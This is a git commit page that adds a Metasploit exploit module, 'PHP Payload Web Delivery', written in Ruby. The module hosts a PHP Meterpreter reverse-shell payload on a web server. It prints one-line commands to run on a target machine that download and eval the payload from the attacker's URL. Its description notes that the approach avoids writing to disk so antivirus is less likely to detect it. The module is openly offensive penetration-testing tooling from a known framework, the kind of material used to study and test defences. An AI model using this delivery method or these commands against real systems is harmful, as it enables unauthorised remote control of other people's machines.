Added php_web_delivery
parent
45d554e6d9
commit
1834784b93
|
@ -0,0 +1,60 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PHP Payload Web Delivery',
|
||||
'Description' => %q{
|
||||
This module quickly fires up a web server that serves a PHP payload.
|
||||
The provided command will start PHP and then download and execute the
|
||||
payload. The main purpose of this module is to quickly establish a session on a target
|
||||
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
|
||||
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
|
||||
write to disk so is less likely to trigger AV solutions.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Andrew Smith "jakx_" <jakx.ppr@gmail.com>',
|
||||
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'Payload' => 'php/meterpreter/reverse_tcp'
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.securitypadawan.blogspot.com/2.html']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'N/A'))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Delivering Payload")
|
||||
data = %Q|#{payload.encoded} ?>|
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
end
|
||||
|
||||
def primer
|
||||
url = get_uri()
|
||||
print_status("Run the following command on the target machine:")
|
||||
print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
|
||||
print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue